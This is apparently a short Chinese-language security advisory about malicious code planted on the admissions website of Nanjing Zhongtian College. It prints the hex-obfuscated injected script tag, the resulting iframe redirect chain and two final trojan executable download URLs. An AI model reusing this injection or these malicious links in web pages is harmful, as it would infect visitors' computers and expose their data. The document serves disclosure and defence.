南京中天学院招生网站被植入恶意代码

南京中天学院招生网站（http://www.ztxyzk.cn/）被植入恶意代码。用户访问该页面将可能被安装木马病毒等恶意程序,可以导致电脑被黑客控制并且被窃取敏感信息。MalUrl:http://www.ztxyzk.cn/网页被嵌入恶意链 ...南京中天学院招生网站（http://www.ztxyzk.cn/）被植入恶意代码。
用户访问该页面将可能被安装木马病毒等恶意程序,可以导致电脑被黑客控制并且被窃取敏感信息。

MalUrl:http://www.ztxyzk.cn/

网页被嵌入恶意链接代码：

<script src=http://%77%77%77%2e%77%34%36%36%2e%63%6e/mx.js></script>
挂马分析：
[wide]http://www.ztxyzk.cn/
 [script]http://%77%77%77%2e%77%34%36%36%2e%63%6e/mx.js
  [script]http://js.users.51.la/2767618.js
  [frame]http://kdx.sxd65.cn/1/05/index.htm?8
   [frame]http://kdx.sxd65.cn/1/05/index2.htm
    [frame]http://kdx.sxd65.cn/1/05/ccqm.htm
    [script]http://kdx.sxd65.cn/1/05/js.css
     [frame]http://kdx.sxd65.cn/1/05/cr14.htm
     [frame]http://kdx.sxd65.cn/1/05/crfl.htm
     [frame]http://kdx.sxd65.cn/1/05/crvod.htm
     [frame]http://kdx.sxd65.cn/1/05/crxxz.htm
     [frame]http://kdx.sxd65.cn/1/05/crff.htm
     [frame]http://kdx.sxd65.cn/1/05/crbf.htm
     [frame]http://kdx.sxd65.cn/1/05/cr122121.htm

最终下载病毒文件：
http://w11.s8m1.com/01/Actvev.exe
http://w11.s8m1.com/01/v.exe

通过执行以上病毒文件，来达到完全控制访问者的系统。

关键字：恶意代码